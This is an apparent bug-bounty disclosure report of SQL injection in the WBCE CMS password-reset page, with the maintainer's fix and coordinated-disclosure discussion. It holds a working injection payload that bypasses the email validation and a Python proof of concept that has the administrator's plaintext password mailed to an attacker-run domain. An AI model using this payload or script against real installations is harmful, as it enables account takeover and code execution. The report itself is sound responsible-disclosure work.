SQL Injection in wbce/wbce_cms
Reported on
Nov 27th 2021
Description
Plaintext administrator password recovery vulnerability due to SQL injection in password reset page.
admin/login/forgot/index.php lines 33-34:
$sSql = "SELECT * FROM `{TP}users` WHERE `email` = '" . $email . "'";
$rRow = $database->query($sSql);
Due to poor email validation attacker can inject arbitrary SQL queries and recover administrator password.
admin/login/forgot/index.php, lines 26-30:
$email = strip_tags($wb->get_post('email'));
if ($admin->validate_email($email) == false) {
$oMsgBox->error($MESSAGE['USERS_INVALID_EMAIL']);
$email = '';
}
validate_email function which is located in framework/class.wb.php, lines 617-631:
public function validate_email($email)
{
if (function_exists('idn_to_ascii')) {
// use pear if available
$email = @idn_to_ascii($email);
} else {
require_once WB_PATH . '/include/idna_convert/idna_convert.class.php';
$IDN = new idna_convert();
$email = $IDN->encode($email);
unset($IDN);
}
// regex from NorHei 2011-01-11
$retval = preg_match("/^((([!#$%&'*+\\-\/\=?^_`{|}~\w])|([!#$%&'*+\\-\/\=?^_`{|}~\w][!#$%&'*+\\-\/\=?^_`{|}~\.\w]{0,}[!#$%&'*+\\-\/\=?^_`{|}~\w]))[@]\w+(([-.]|\-\-)\w+)*\.\w+(([-.]|\-\-)\w+)*)$/", $email);
return ($retval != false);
}
Regex filtering can't be optimal protection for SQL injection...
Steps to reproduce:
1.First we need to select administrator from users table, using this payload: '/**/or/**/user_id=1/**/or/**/'random@pylibs.org (Which will bypass regex filtering in class.wb.php)
2.Even if we have no control of administrator's email, we can send it to another email.
admin/login/forgot/index.php lines 76-77:
// Setup email to send
$mail_to = $email;
Payload that I used can be real email address, on the other hand it can inject SQL query and select administrator from users table. In this example I used pylibs.org domain and installed forwarder for all emails to dectavianus07@gmail.com.
Proof of Concept
// PoC.py
import requests
_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from my localhost environment
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'close'
}
_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"
r = requests.post(url = _url, headers = headers, data = _p)
if r.status_code == 200:
print('[+] Check your email, you are probably going to recevice plaintext password which belongs to administrator :)')
- In the end, you should receive email from vulnerable endpoit to
'/**/or/**/user_id=1/**/or/**/'random@yourdomainname.comemail
Impact
Authentication bypass for this web application is like preauth RCE, as authenticated administrator can easily run php scripts using templates or uploading new modules.
Occurrences
SECURITY.md
a year ago
@admin can we invite any other people to this page? I contacted with vendor they are asking about vulnerability details. I think it's better to see by vendor in this page so I won't copy all information
@maxway2021 - feel free to share the URL for this page with others. It is protected, and so only users with maintainer permissions can view your report.
I have tagged you in a comment on GitHub responding to the maintainers.
Regarding the CVE, we can assign a CVE if the maintainer is also happy to do so once the report has been marked as valid and fixed.
Let me know if you have any further questions, and happy to help 👋
We just need to wait for the maintainer to come on platform and confirm this as well.
I shared the link with vendors, I think they will respond soon.
confirmed. Fixed in https://github.com/WBCE/WBCE_CMS/commit/6ca63f0cad5f0cd606fdb69a372f09b7d238f1d7
we will release WBCE CMS 1.5.2 tomorrow
oh well I think you will assign CVE after fix okay understood 😅
Exactly, we just require the maintainer to confirm the commit SHA that fixes the vulnerability via the platform.
What am I supposed to do? Click on the green button top right?
And please allow the WBCE users an appropriate time to fix their installation before disclosing this vulnerability.
@maintainer - when you are ready to make this report public, please click the confirm fix button, where you will be asked to provide a commit SHA and patched version.
Just for clarity, once this report is "fixed", it will be visible to the public.
We will arrange this once the fix has been confirmed and the maintainer is happy for a CVE to be published for this report.
It seems that the maintainer would like a small delay in taking the report public + publishing a CVE, so that the community can fix their vulnerable installations.
@maintainer I think this is the best way to inform about criticial vulnerability to users. It will help users to know why they should update the system asap.
@maxway2021 - we can, we just need the go-ahead from the maintainer, and we can arrange this for you. We will wait for the maintainer to respond and share their thoughts 👍
We have informed our users as best as we can (website, forum, newsletter, update information in the backend) and gave them 7 days to update. So yes, you can go ahead creating a CVE ID.
